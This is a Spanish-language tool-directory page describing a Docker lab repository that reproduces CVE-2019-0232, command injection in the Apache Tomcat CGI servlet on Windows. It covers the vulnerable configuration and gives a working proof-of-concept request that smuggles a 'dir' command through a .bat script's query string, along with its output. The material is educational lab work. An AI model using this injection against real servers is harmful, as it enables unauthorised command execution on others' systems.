Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Preproduce-CVE-2019-0232 — Entorno de laboratorio basado en Docker para reproducir CVE-2019-0232, una vulnerabilidad de ejecución remota de código en Apache Tomcat CGI Servlet en Windows, con ejemplos de explotación. | Kitploit
Herramientas/GitHubGitHub/luongchivi/preproduce-cve-2019-0232
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubluongchivi/preproduce-cve-2019-0232

Preproduce-CVE-2019-0232

Entorno de laboratorio basado en Docker para reproducir CVE-2019-0232, una vulnerabilidad de ejecución remota de código en Apache Tomcat CGI Servlet en Windows, con ejemplos de explotación.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 1 mesAún no revisado

CVE-2019-0232 - Ejecución Remota de Código en Apache Tomcat CGI Servlet

Este repositorio proporciona un entorno de laboratorio basado en Docker para reproducir la vulnerabilidad CVE-2019-0232 en Apache Tomcat 9.0.17 en Windows.

Resumen de la Vulnerabilidad

CVE-2019-0232 es una vulnerabilidad de ejecución remota de código en el Servlet CGI de Apache Tomcat cuando se ejecuta en Windows. El problema surge debido al manejo inadecuado de los argumentos de línea de comandos cuando el parámetro enableCmdLineArguments está configurado como true. Un atacante puede pasar argumentos arbitrarios al script CGI a través de la cadena de consulta, lo que lleva a la ejecución de comandos del sistema.

  • Versiones afectadas: Apache Tomcat 9.0.0.M1 a 9.0.17
  • Versiones corregidas: 9.0.18 y posteriores
  • Condiciones requeridas:
    • Sistema operativo Windows
    • enableCmdLineArguments=true en la configuración del servlet CGI
    • Servlet CGI habilitado y mapeado a un patrón de URL

Entorno de Laboratorio

Estructura de Directorios

root@kitploit:~
tomcat-cgi-lab
├── docker-compose.yml
├── Dockerfile
└── tomcat
	├── apache-tomcat-9.0.17-windows-x64.zip
    └── apache-tomcat-9.0.17
        ├── conf
        │   └── context.xml              ← (privileged="true")
        └── webapps
            └── ROOT
                └── WEB-INF
                    ├── web.xml           ← (Configuración CGI)
                    └── cgi-bin
                        └── test.bat      ← (Script .bat)

Archivos de Configuración

  • context.xml: Establece privileged="true" para permitir que la aplicación web use el servlet CGI.
  • web.xml: Define el servlet CGI con enableCmdLineArguments=true y lo mapea a /cgi-bin/*.
  • test.bat: Un script batch simple que devuelve un mensaje de bienvenida.

Primeros Pasos

Requisitos Previos

  • Docker (modo contenedores Windows)
  • Docker Compose

Construir y Ejecutar

root@kitploit:~
docker-compose build --no-cache
docker-compose up -d

Explotación

root@kitploit:~
curl -i "http://localhost:8080/cgi-bin/test.bat?&dir"

Welcome to CGI Test Page
 Volume in drive C has no label.
 Volume Serial Number is 3E70-7C38

 Directory of C:\apache-tomcat-9.0.17\webapps\ROOT\WEB-INF\cgi-bin

07/12/2026  11:45 AM    <DIR>          .
07/12/2026  11:45 AM    <DIR>          ..
07/12/2026  12:25 PM                78 test.bat
               1 File(s)             78 bytes
               2 Dir(s)  136,027,971,584 bytes free
Descargar herramienta